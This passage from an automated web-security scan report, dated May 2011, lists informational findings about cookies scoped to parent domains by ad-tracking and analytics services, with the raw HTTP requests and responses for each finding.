Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001jAsGaJH702WG00003jBofaIOs07Si00001; B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001juYgaL6v07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 14:07:17 GMT
Connection: close
Content-Length: 2128

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

9.26. http://cf.addthis.com/red/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4dc7f39843ecbee9&callback=_ate.ad.hrr&pub=irishtimes&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1syp1cb HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 09 May 2011 14:04:52 GMT
Set-Cookie: di=1304471550.1FE|1304471550.1OD|1304471550.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 14:04:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08-Jun-2011 14:04:52 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Mon, 09 May 2011 14:04:51 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

9.27. http://content.pulse360.com/cgi-bin/context.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/context.cgi?id=91041742&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
set-cookie: vi_1.021=130494962871114765000106049048049; domain=.pulse360.com; path=/; expires=Tue, 08-May-2012 14:00:28 GMT
set-cookie: fc_1.2=AXzzx00; domain=.pulse360.com; path=/; expires=Mon, 16-May-2011 14:00:28 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 3662

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...

9.28. http://core.insightexpressai.com/adServer/adServerESI.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/adServerESI.aspx?bannerID=178140&script=false&redir=http://core.insightexpressai.com/adserver/1pixel.gif HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBanners2554=175183; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIBanners2579=178140; IXAIBannerCounter178140=1; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAILastHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAICampaignCounter2579=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/7.0
Content-Length: 153
Content-Type: text/html
Location: http://core.insightexpressai.com/adserver/1pixel.gif
Set-Cookie: IXAIBanners2579=178140,178140; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178140=2; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2579=5%2f9%2f2011+9%3a51%3a44+AM; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2579=2; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:53 GMT
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:53 GMT
Connection: close
Cache-Control: no-store

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

9.29. http://cspix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.irishtimes.com%2fnewspaper%2ftheticket%2f2011%2f0506%2f1224296203710.html HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt113zye; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh13zye00y3l010k0150k; rdrlst=...[SNIP]...; sglst=...[SNIP]...; vstcnt=...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt11407xxzt1tr37xzt1tr37xzt11407xxzt113zye; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh1407x00z3l020k0250l; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: sglst=...[SNIP]...; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: vstcnt=...[SNIP]...; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=1287355&id=1287330&id=1280693&id=1277220&id=1277245&id=1266387&id=1265430&id=1265419&id=1264304&id=1261148&id=1259050&id=1259015&id=1258217&id=1256870&id=1256778&id=1256768&id=1256837&id=1256878&id=1255378&id=1256592
Content-Length: 0
Date: Mon, 09 May 2011 14:05:46 GMT


9.30. http://cw-m.d.chango.com/m/cw

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cw-m.d.chango.com
Path:   /m/cw

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cw HTTP/1.1
Host: cw-m.d.chango.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_cw=1; _i_admeld=1; _i_ox=1; _i_st=1; _i_pm=1; _i_tm=1; _i_ab=1; _i_sl=1; _i_gid=1; _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://bh.contextweb.com/bh/rtset?do=add&ev=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe&pid=535495&rurl=http%3A//d.chango.com/m/s/contextweb&x=2011-06-23
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Thu, 06 May 2021 14:00:03 GMT; Path=/
Set-Cookie: _i_cw=1; Domain=chango.com; expires=Thu, 23 Jun 2011 14:00:03 GMT; Path=/
Connection: close


9.31. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:04 GMT

GIF89a.............!.......,...........D..;

9.32. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 05-Nov-2011 14:00:06 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;

9.33. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2417656649724524407

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2417656649724524407; Domain=.mediabrandsww.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;

9.34. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3706692347515356359

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3706692347515356359; Domain=.p-td.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;

9.35. http://data.adsrvr.org/map/cookie/contextweb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.adsrvr.org
Path:   /map/cookie/contextweb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /map/cookie/contextweb HTTP/1.1
Host: data.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967

Response

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Date: Mon, 09 May 2011 14:00:07 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988bc661e967
Pragma: no-cache
Set-Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967; domain=.adsrvr.org; expires=Wed, 09-May-2012 14:00:08 GMT; path=/
Set-Cookie: X-Mapping-fjhppofk=56D14B6C0CC14A5761E9A7895E1F89AF; path=/
Content-Length: 213

Redirecting to: <a href="http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988bc661e967">http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988
...[SNIP]...

9.36. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.irishtimes.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.irishtimes.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1nv0nd4 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 456
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 14:04:32 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 14:04:32 GMT; Path=/
Set-Cookie: di=%7B%7D..1304949872.1FE|1304949872.1OD|1304949872.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 08:22:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 14:04:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 14:04:32 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099","http://cspix.media6degree
...[SNIP]...

9.37. http://edge.quantserve.com/quant.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.quantserve.com
Path:   /quant.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quant.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: edge.quantserve.com

Response

HTTP/1.1 200 OK
Connection: close
ETag: "20606:E0-713827831-1304949969580"
Vary: Accept-Encoding
Last-Modified: Mon, 09-May-2011 14:06:09 GMT
Content-Type: application/x-javascript
Set-Cookie: mc=4dc7f4d1-8dd66-3f1ef-84d25; expires=Mon, 09-May-2021 14:06:09 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 14:06:09 GMT
Date: Mon, 09 May 2011 14:06:09 GMT
Server: QS
Content-Length: 5265

if(!__qc){var __qc={qcdst:function(){if(__qc.qctzoff(0)!=__qc.qctzoff(6))return 1;return 0;},qctzoff:function(m){var d1=new Date(2000,m,1,0,0,0,0);var t=d1.toGMTString();var d3=new Date(t.substring(0,
...[SNIP]...

9.38. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343?[AQB]&ndh=1&t=9/4/2011%209%3A1%3A25%201%20300&ce=ISO-8859-1&cdp=3&pageName=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&g=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&cc=AUD&ch=index&events=event1&c1=index&v1=index&c2=index%3Anews&v2=index%3Anews&c6=article&v6=article&c7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&v7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&c8=TimByron&v8=TimByron&c14=New&v14=New&c21=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&c28=No%20cookie%20data&v28=No%20cookie%20data&c29=No%20cookie%20data&v29=No%20cookie%20data&c30=No%20cookie%20data&v30=No%20cookie%20data&x=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: f2nthevine.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:56 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_l8dx7Ebox7Ccdo=[CS]v4|0-0|4DC7F500[CE]; Expires=Sat, 7 May 2016 14:06:56 GMT; Domain=.112.2o7.net; Path=/
